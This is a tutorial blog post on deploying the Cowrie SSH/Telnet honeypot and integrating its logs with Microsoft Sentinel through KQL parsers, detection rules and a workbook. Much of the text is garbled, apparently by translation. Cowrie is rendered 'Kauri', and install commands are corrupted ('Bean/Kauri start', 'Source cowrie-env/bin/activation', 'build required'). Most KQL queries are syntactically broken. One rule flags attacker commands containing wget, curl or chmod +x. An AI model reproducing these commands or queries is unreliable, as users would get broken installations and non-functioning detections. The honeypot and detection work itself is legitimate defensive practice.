Cowrie honeypot and its Integration with Microsoft Sentinel.

Cowrie is an advanced honeypot designed to attract, detect, and analyze malicious activity by emulating Secure Shell (SSH) and Telnet services. Honeypots like Cowrie, a type of cybersecurity tool, are used to create controlled environments that mimic real systems to lure attackers. When an attacker interacts with Cowrie, their activity is logged (json), providing valuable insight into the attack method and motivation.

Kauri’s main features

1. SSH and Telnet emulation: Cowrie simulates SSH and Telnet services that are commonly targeted by attackers seeking unauthorized access to systems.
2. Detailed logging: Capture detailed logs of attempted commands, executed commands, and interaction patterns. This will help you understand the attack methodologies and tools used by attackers.
3. File and command logging: In addition to logging commands, Cowrie logs files uploaded and downloaded by attackers, providing a comprehensive view of activity.
4. Interactive session support: Cowrie simulates an interactive command line session, allowing you to capture more detailed information about attacker behavior.
5. Dynamic configuration: Cowrie’s configuration can be tailored to mimic a variety of environments and settings, improving efficiency in a variety of scenarios.

Why use kauri?

1. threat intelligence
   Cowrie provides valuable insight into attack trends and techniques. By observing and analyzing attackers’ interactions with honeypots, security experts can gather information about attack vectors, tools, and methodologies. This intelligence is important for improving security measures and defenses.
2. Detect unknown threats
   Honeypots like Cowrie can detect and log unknown or new threats that cannot be caught by existing security measures. Because attackers have access to honeypots, they can discover new vulnerabilities and attack methods before they affect real systems.

3. Improved security posture:
   By studying the data collected by Cowrie, organizations can strengthen their security posture. This includes improving intrusion detection systems (IDS), updating firewall rules, and improving overall security policies based on real data collected from honeypots.

4. Low risk deployment:
   Because Cowrie is designed to simulate services rather than a real production environment, there are inherent risks involved. Any malicious activity targeting a honeypot does not affect actual production systems, making it a safe and controlled way to study attacks.

conclusion

Cowrie is a powerful and versatile tool for cybersecurity professionals looking to understand and combat malicious activity targeting SSH and Telnet services. By deploying Cowrie, organizations can gain critical insights into attack patterns, detect new threats, and improve their overall security posture while maintaining a low-risk environment for research and analysis.

Integrate Cowrie honeypot with Microsoft Sentinel (SIEM and SOAR)

Integrating Cowrie with Microsoft Sentinel offers several benefits to strengthen your cybersecurity operations. Microsoft Sentinel is a cloud-based security information and event management (SIEM) service that delivers intelligent security analytics and threat intelligence across the enterprise. By combining Cowrie’s detailed honeypot data with Sentinel’s advanced analytics and automation capabilities, organizations can achieve a more comprehensive and effective security posture.
Analysis rules, threat hunting, automation, workbooks, custom parsers.

Step-by-step guide to installing Cowrie on Linux:

Github: GitHub – cowrie/cowrie: Cowrie SSH/Telnet honeypot https://cowrie.readthedocs.io

1. system update

Start by updating your package list and upgrading existing packages.

sudo apt update && sudo apt upgrade -y

2. Install required dependencies

Install the packages and libraries required by Cowrie.

sudo apt install -y python3-pip python3-venv python3-dev libssl-dev libffi-dev build required git

3. Create a Cowrie user

Create a dedicated user to run Cowrie.

sudo adduser –disabled-password –gecos ‘Cowrie’ cowrie

4. Become a Cowrie user

Switch to your Cowrie user account.

sudo -u kauri -i

5. Cowrie repository replication

Clone the Cowrie GitHub repository to the Cowrie user’s home directory.

git clone https://github.com/cowrie/cowrie.git

Go to the Cowrie directory.

CD Kauri

6. Setting up a Python virtual environment

Create and activate a Python virtual environment within the Cowrie directory.

python3 -m venv cowrie-env

Source cowrie-env/bin/activation

7. Install Cowrie’s Python dependencies

Install the required Python packages using pip.

pip install -r requirements.txt

8. kauri composition

Copy the sample configuration file to create your own configuration.

cp cowrie.cfg.sample cowrie.cfg

cp userdb.txt.sample userdb.txt

Edit cowrie.cfg to adjust settings as needed. For basic usage, you may not need to change anything at first. Use a text editor like nano.

nanokauri.cfg

9. kauri start

Start Cowrie using the provided startup script.

Bean/Kauri start

You can stop Cowrie as follows:

Vienna/Kauri stop

And check the status using:

Bin/Kauri status

10. Check installation

To check if Cowrie is running, check the logs in the cowrie/log directory.

tail -f log/cowrie.log

Access cowrie using the Windows command prompt and check the log flow.

Learn how to use it to its full potential and capture and log attacker activity.

1. Connect to Kauri

To interact with Cowrie, connect using SSH or Telnet. For example, if Cowrie is configured to listen for SSH on port 2222:

2. Explore Cowrie’s features
3. test certification

• Try a different username and password: Cowrie logs all login attempts, including failed attempts. To see how Cowrie logs these attempts, try using common usernames such as root, administrator, or user, and various passwords.

• ssh -p 2222 root@ 172.210.56.197
  ssh -p 2222 admin@ 172.210.56.197
  ssh -p 2222 user@ 172.210.56.197

• Check log: Cowrie records authentication attempts in a log file. Monitor var/log/cowrie.log to see how these attempts are logged.

2. run command

• Try using common commands: Once logged in, you can run common Unix commands to simulate normal or malicious activity. Example: Ls, whoami, uname -a

3. file upload

• Use SCP or SFTP (if configured): If Cowrie is set up to handle SCP or SFTP, you can try uploading a file.
  scp -P 2222 localfile.txt user@172.210.56.197:/tmp

4. Network Interaction Testing

• Check open ports: Use a tool like nmap to scan Cowrie and check for open ports.
  nmap -p- 172.210.56.197

Cowrie: Leveraging Microsoft Sentinel with a parser

To parse and normalize Cowrie logs in Microsoft Sentinel using the Kusto Query Language (KQL), you can create queries to extract and organize relevant information from the raw log data. Below is an example KQL query that parses Cowrie logs, assuming the logs are stored in a custom log type (e.g. newCowrie_CL).

KQL query for parsing Cowrie logs

The following KQL query parses log entries and displays them in normalized format. Adjust field names based on your actual log structure and requirements.

// Query to normalize and extract information from Cowrie logs

newCowrie_CL
| extended EventID = tostring(parse_json(RawData).eventid);
URL = tostring(parse_json(RawData).url),
Outfile = tostring(parse_json(RawData).outfile);
SHA256 = tostring(parse_json(RawData).shasum),
sensor = tostring(parse_json(RawData).sensor);
message = tostring(parse_json(RawData).message);
SourceIP = tostring(parse_json(RawData).src_ip);
Session ID = tostring(parse_json(RawData).session)
| Project EventID, URL, Outfile, SHA256, Sensor, Message, SourceIP, SessionID

Leveraging Microsoft Sentinel with Cowrie: Analysis Rules

Creating analysis rules in Microsoft Sentinel based on Cowrie logs can provide you with valuable insights into the security threats and activities captured by your honeypot. Below are some key use cases and corresponding KQL queries that can be used to create these analysis rules.

1. Detect suspicious file downloads

Use cases: Identifies instances where files were downloaded from suspicious or known malicious URLs.

KQL query:
newCowrie_CL
| extended EventID = tostring(parse_json(RawData).eventid);
URL = tostring(parse_json(RawData).url),
SourceIP = tostring(parse_json(RawData).src_ip)
| Where EventID == “cowrie.session.file_download”
| If your URL contains “malicious-site.com” or if your URL contains “suspicious”
| Project SourceIP, URL

2. Warning about high number of failed login attempts

Use cases: Detect brute force or password guessing attacks by monitoring high volumes of failed login attempts.

KQL query:

newCowrie_CL
| extended EventID = tostring(parse_json(RawData).eventid);
SourceIP = tostring(parse_json(RawData).src_ip)
| Where EventID == “cowrie.login.failed”
| Summarize FailedAttempts = count() by SourceIP.
| where FailedAttempts > 2
| Project SourceIP, a failed attempt
| Order with FailedAttempts description

3. Monitor abnormal file execution

Use cases: Detects attempts to run files or scripts that are unusual or unusual for the environment.

newCowrie_CL
| extended EventID = tostring(parse_json(RawData).eventid);
Command = tostring(parse_json(RawData).command)
SourceIP = tostring(parse_json(RawData).src_ip)
| Where EventID == “cowrie.session.command”
| Here the command contains “wget”, the command contains “curl”, or the command contains “chmod +x”.
| Project SourceIP, command

4. File upload and download detection

Use cases: Monitor file uploads and downloads to detect potential leaks or data theft activity.

newCowrie_CL
| extended EventID = tostring(parse_json(RawData).eventid);
URL = tostring(parse_json(RawData).url),
SourceIP = tostring(parse_json(RawData).src_ip);
Outfile = tostring(parse_json(RawData).outfile)
| where EventID is (“cowrie.session.file_upload”, “cowrie.session.file_download”)
| Project EventID, SourceIP, URL, Outfile

Rule Description: This rule helps you identify potentially malicious file transfers by monitoring file upload and download activity.

5. Detect connection events

Use cases: Track connection events to detect unusual patterns of access or possible reconnaissance activity.

newCowrie_CL
| extended EventID = tostring(parse_json(RawData).eventid);
SourceIP = tostring(parse_json(RawData).src_ip)
| Where EventID == “cowrie.session.closed”
| Project source IP

Leveraging Microsoft Sentinel with Cowrie: Workbook

The Azure Monitor for Cowrie logs workbook includes extracting and visualizing various aspects of your data using the Kusto Query Language (KQL). Below is a guide to building a comprehensive, dynamic workbook that includes a variety of visualizations and insights from Cowrie logs.

1. Overview Dashboard

purpose: Provides a high-level summary of all key indicators.

newCowrie_CL
| EventID extension = tostring(parse_json(RawData).eventid)
| summarize
totalevents = count();
TotalSuccessfulLogins = countif(EventID == “cowrie.login.success”);
TotalFailedLogins = countif(EventID == “cowrie.login.failed”);
TotalFileUploads = countif(EventID == “cowrie.session.file_upload”);
TotalFileDownloads = countif(EventID == “cowrie.session.file_download”);
TotalCommands = countif(EventID == “cowrie.command.input”);
TotalSessionClosed = countif(EventID == “cowrie.session.closed”);
TotalSessionConnect = countif(EventID == ” cowrie.session.connect “)
| project
total event,
Total successful login,
Total failure login,
Total file upload,
Total file download,
general command,
Your total session has ended.
TotalSessionConnect

Microsoft Global Hackathon-2024 – Cowrie-Sentinel Integration:
introduction
Technology Deep Dive

Hackathon 2024 – Cowrie-Sentinel Integration(20-09-2024 22-09-17).wmv